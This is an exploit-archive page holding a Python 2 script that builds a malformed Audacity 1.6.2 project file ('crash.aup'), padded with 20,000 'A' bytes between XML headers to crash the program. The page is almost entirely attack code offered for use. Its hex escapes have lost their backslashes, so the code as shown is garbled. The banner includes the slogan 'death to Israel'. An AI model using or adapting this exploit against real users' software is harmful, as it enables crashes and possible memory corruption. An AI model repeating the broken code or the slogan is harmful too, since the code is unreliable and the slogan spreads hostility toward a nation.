[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Audacity 1.6.2 (.aup File) Remote off by one Crash Exploit
# Published : 2009-01-07
# Author : Stack
# Previous Title : Perception LiteServe 2.0.1 (user) Remote Buffer Overflow PoC
# Next Title : WinAmp GEN_MSN Plugin Heap Buffer Overflow PoC
#usage: exploit.py
print "**************************************************************************"
print " Audacity 1.6.2 (.aup file ) Remote off by one Crash Exploitn"
print " Author: Mountassif Moad "
print " the best: Evil finger & v4 Team "
print " Tested on: Windows XP Pro SP2 Frn"
print " Greetings to: All friends"
print " almawto li israeln"
print "**************************************************************************"
header = (
"x3cx3fx78x6dx6cx20x76x65x72"
"x73x69x6fx6ex3dx22x31x2ex30x22x3f"
"x3ex0dx0ax3cx61x75x64x61x63x69x74"
"x79x70x72x6fx6ax65x63x74x20x70x72"
"x6fx6ax6ex61x6dx65x3dx22"
)
header2 = (
"x22x20x76x65x72x73x69x6fx6ex3dx22"
"x31x2ex31x2ex30x22x20x61x75x64x61"
"x63x69x74x79x76x65x72x73x69x6fx6e"
"x3dx22x31x2ex32x2ex36x22x20x73x65"
"x6cx30x3dx22x30x2ex30x30x30x30x30"
"x30x30x30x30x30x22x20x73x65x6cx31"
"x3dx22x30x2ex30x30x30x30x30x30x30"
"x30x30x30x22x20x76x70x6fx73x3dx22"
"x30x22x20x68x3dx22x30x2ex30x30x30"
"x30x30x30x30x30x30x30x22x20x7ax6f"
"x6fx6dx3dx22x38x36x2ex31x33x32x38"
"x31x32x35x30x30x30x22x20x72x61x74"
"x65x3dx22x34x34x31x30x30x2ex30x30"
"x30x30x30x30x22x20x3ex0dx0ax09x3c"
"x74x61x67x73x20x74x69x74x6cx65x3d"
"x22x22x20x61x72x74x69x73x74x3dx22"
"x22x20x61x6cx62x75x6dx3dx22x22x20"
"x74x72x61x63x6bx3dx22x2dx31x22x20"
"x79x65x61x72x3dx22x22x20x67x65x6e"
"x72x65x3dx22x2dx31x22x20x63x6fx6d"
"x6dx65x6ex74x73x3dx22x22x20x69x64"
"x33x76x32x3dx22x31x22x20x2fx3ex0d"
"x0ax3cx2fx61x75x64x61x63x69x74x79"
"x70x72x6fx6ax65x63x74x3e"
)
buff = "x41" * 20000
exploit = header + buff + header2
try:
out_file = open("crash.aup",'w')
out_file.write(exploit)
out_file.close()
raw_input("nExploit file created!n")
except:
print "Error"
# www.Syue.com [2009-01-07]